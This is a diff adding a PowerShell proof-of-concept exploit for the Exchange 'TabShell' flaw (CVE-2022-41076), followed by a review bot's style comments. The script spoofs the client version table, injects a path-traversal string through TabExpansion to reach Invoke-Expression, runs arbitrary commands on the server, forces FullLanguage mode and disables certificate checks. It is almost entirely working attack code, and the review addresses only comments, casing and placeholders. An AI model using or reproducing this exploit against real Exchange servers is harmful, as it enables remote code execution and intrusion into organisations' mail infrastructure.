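--- a/TabShell_CVE-2022-41076_poc.ps1
+++ b/TabShell_CVE-2022-41076_poc.ps1
@@ -0,0 +1,31 @@
+$secureString = ConvertTo-SecureString -String "Pwd" -AsPlainText -Force
+$UserCredential = New-Object System.Management.Automation.PSCredential -ArgumentList "lab\john", $secureString
+$version = New-Object -TypeName System.Version -ArgumentList "2.0"
+$mytable = $PSversionTable
+$mytable["WSManStackVersion"] = $version
+$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck -ApplicationArguments @{PSversionTable=$mytable}
+$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://exchange.lab.local/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOption
+
+
+Invoke-Command -Session $Session -ScriptBlock { TabExpansion -line ";../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression" -lastWord "-test" }
+
+
+Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[System.Security.Principal.WindowsIdentity]::GetCurrent().Name" }
+
+Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[Diagnostics.Process]::Start('mspaint.exe')" }
+
+Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "(new-object System.Diagnostics.Process)::Start('mspaint.exe')" }
+
+invoke-expression "`$ExecutionContext.SessionState.LanguageMode"
+
+invoke-expression "`$ExecutionContext.SessionState.LanguageMode='FullLanguage'"
+
+
+$ps = new-object System.Diagnostics.Process
+$ps.StartInfo.Filename = "ipconfig.exe"
+$ps.StartInfo.Arguments = " /all"
+$ps.StartInfo.RedirectStandardOutput = $True
+$ps.StartInfo.UseShellExecute = $false
+$ps.start()
+$ps.WaitForExit()
+[string] $Out = $ps.StandardOutput.ReadToEnd();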
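Review bot: The file has no header comment stating what it demonstrates, which version of the component it was written against, or that the values on lines 1–2 and 7 are lab placeholders, so a reader cannot tell the scope of the demonstration from the file itself; a comment such as `# PoC for CVE-2022-41076 (TabShell); "lab\john"/"Pwd" and http://exchange.lab.local are placeholders for an isolated lab environment` at the top would make that explicit. The session options on line 6 (`-SkipCACheck -SkipCNCheck -SkipRevocationCheck`) deserve a one-line note that they disable certificate validation and are only acceptable in that lab context. Cmdlet casing is also inconsistent (`Invoke-Command` vs `invoke-expression`, `new-object`), and the `$Out` value assigned on the last line is never written anywhere, which is worth a trailing comment saying whether that is intentional.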